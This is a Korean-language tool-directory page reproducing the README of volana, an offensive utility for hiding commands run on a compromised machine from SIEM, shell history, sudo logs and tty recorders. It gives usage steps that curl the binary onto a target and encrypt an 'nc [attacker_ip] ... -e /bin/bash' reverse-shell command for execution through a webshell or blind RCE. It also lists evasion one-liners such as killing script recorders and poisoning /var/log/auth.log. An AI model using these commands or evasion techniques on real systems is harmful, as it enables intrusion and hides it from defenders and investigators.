Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
volana — 🌒 셸 명령어 난독화를 통한 탐지 시스템 회피 | Kitploit
도구/GitHubGitHub/ariary/volana
ExploitationIDS/IPS EvasionShellcodePenetration TestingCommand and ControlRed Teaming
GitHubariary/volana

volana

🌒 셸 명령어 난독화를 통한 탐지 시스템 회피

저장소 보기
12093년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

volana (마다가스카르어로 달)

root@kitploit:~
{ 사용하기 ; 🌚(숨기기 대상); 🌞(감지 대상) } 

쉘 명령 난독화로 SIEM/탐지 시스템 회피

침투 테스트 중 중요한 측면은 은밀함(stealth)입니다. 따라서 작업 후 흔적을 지워야 합니다. 그러나 많은 인프라는 명령을 기록하고 실시간으로 SIEM에 전송하여 사후 정리만으로는 무용지물이 됩니다.

volana는 자체 쉘 런타임을 제공하여 침해된 시스템에서 실행된 명령을 숨기는 간단한 방법을 제공합니다 (명령을 입력하면 volana가 실행합니다). 이렇게 하면 작업 중에 흔적을 지울 수 있습니다.

사용법

인터랙티브 쉘을 확보해야 합니다. (실행 방법을 찾으세요, 당신은 해커입니다, 그게 당신의 일입니다! 그렇지 않다면). 그런 다음 대상 머신에 다운로드하여 실행하세요. 그게 다입니다, 이제 은밀하게 실행하려는 명령을 입력할 수 있습니다.

root@kitploit:~
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #you are allowed to be a bit cocky
volana » [command]

volana 콘솔 키워드:

  • ring: 링 모드를 활성화합니다. 즉, 각 명령이 다른 많은 명령과 함께 실행되어 추적을 은폐합니다 (시스템 호출을 모니터링하는 솔루션으로부터)
  • exit: volana 콘솔 종료

비대화형 쉘에서

비대화형 쉘(웹쉘 또는 블라인드 RCE)이 있다고 가정하면, encrypt 및 decrypt 하위 명령을 사용할 수 있습니다. 먼저, 내장 암호화 키로 volana를 빌드해야 합니다.

공격자 머신에서

root@kitploit:~
## Build volana with encryption key
make build.volana-with-encryption

## Transfer it on TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

암호화된 명령을 복사하여 RCE로 실행하세요 대상 머신에서

root@kitploit:~
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

왜 그냥 echo [command] | base64 로 명령을 숨기지 않나요? 그리고 대상에서 echo [encoded_command] | base64 -d | bash 로 디코딩하나요?

왜냐하면 우리는 base64 사용에 대해 경고를 발생시키거나 명령에서 base64 텍스트를 찾는 시스템으로부터 보호받고 싶기 때문입니다. 또한 조사를 어렵게 만들고 싶으며 base64는 실제 장애물이 아닙니다.

탐지

volana가 당신을 완전히 보이지 않게 만드는 기적은 아니라는 점을 명심하세요. 그 목표는 침입 탐지와 조사를 더 어렵게 만드는 것입니다.

탐지된다는 것은 특정 명령이 실행되었을 때 경고를 트리거할 수 있는 경우를 의미합니다.

숨기기 대상

  • 기록 명령 출력을 기반으로 하는 탐지 시스템
  • 기록 파일을 기반으로 하는 탐지 시스템
    • .bash_history, ".zsh_history" 등
  • 배시 디버그 트랩을 기반으로 하는 탐지 시스템
  • sudo 내장 로깅 시스템을 기반으로 하는 탐지 시스템
  • 모든 프로세스의 시스템 콜을 시스템 전체에서 추적하는 탐지 시스템 (예: opensnoop)
  • 터미널 (tty) 레코더 (script, screen -L, sexonthebash, ovh-ttyrec, 등)
    • 쉽게 탐지 및 회피 가능: pkill -9 script
    • 일반적인 경우 아님
    • screen은 회피하기가 조금 더 어렵지만, 입력은 기록하지 않습니다 (비밀 입력: stty -echo => 회피)
    • 명령 탐지는 암호화와 함께 volana로 회피할 수 있음

감지 대상

  • 알 수 없는 명령(volana)에 대해 경고를 발생시키는 탐지 시스템
  • 키로거 기반 탐지 시스템
    • 쉽게 회피 가능: 명령 복사/붙여넣기
    • 일반적인 경우 아님
  • syslog 파일 기반 탐지 시스템 (예: /var/log/auth.log)
    • sudo 또는 su 명령에만 해당
    • syslog 파일은 수정될 수 있으며 원하는 대로 오염될 수 있습니다 (예: /var/log/auth.log: logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • 시스템 콜 기반 탐지 시스템 (예: auditd, LKML/eBPF)
    • 분석이 어렵고, 여러 우회 시스템 콜을 만들어 읽을 수 없게 만들 수 있음
  • 로그를 만들기 위한 사용자 정의 LD_PRELOAD 주입
    • 전혀 일반적인 경우가 아님

버그 바운티

클릭베이트 제목 죄송합니다만, 기여자에게는 돈이 지급되지 않습니다. 🐛

다음을 발견하셨다면 알려주세요:

  • volana를 탐지하는 방법
  • volana 명령을 탐지하지 않는 콘솔 감시 방법
  • 탐지 시스템을 회피하는 방법

여기에 보고

크레딧

  • 8 ways to spy on console
  • moonwalk: 작업 후 흔적을 지우는 유사한 도구
도구 다운로드